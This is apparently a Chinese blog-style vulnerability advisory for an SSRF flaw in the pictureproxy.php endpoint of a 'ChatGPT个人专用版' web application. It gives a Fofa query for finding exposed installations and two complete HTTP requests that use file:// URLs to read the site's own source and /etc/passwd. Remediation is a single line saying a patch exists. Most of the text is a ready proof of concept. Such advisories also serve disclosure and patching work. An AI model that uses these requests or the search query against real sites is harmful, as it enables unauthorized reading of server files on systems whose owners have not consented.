ChatGPT个人专用版 pictureproxy.php SSRF漏洞

0x01 漏洞描述:

ChatGPT个人专用版是一种基于人工智能的对话系统,旨在为用户提供个性化的交流体验。它能够理解和生成自然语言,帮助用户解决问题、获取信息或进行创意交流。通过不断学习和优化,ChatGPT个人专用版可以更好地适应用户的需求和偏好,提供更为精准和贴心的服务。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

0x02 搜索语句:

Fofa:title="ChatGPT个人专用版"

0x03 漏洞复现:

宝塔服务网站:

复制代码
GET /pictureproxy.php?url=file:www/wwwroot/网站路径/pictureproxy.php HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

linux服务网站

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

0x04 修复建议:

官方已更新补丁,请即时修复。

相关推荐
云水一下2 小时前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
糖果店的幽灵2 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
云水一下1 天前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
txg6661 天前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
Chengbei111 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
2301_780303902 天前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
技术不好的崎鸣同学2 天前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
dehuisun2 天前
等保2.0实施方案
web安全
treesforest2 天前
高精度IP定位怎么选?从企业需求出发的选型指南
网络·数据库·tcp/ip·web安全·ip·高精度ip查询
doiito(Do It Together)2 天前
【Web安全,微服务安全】HashiCorp Vault 项目深度分析报告
web安全·微服务·安全架构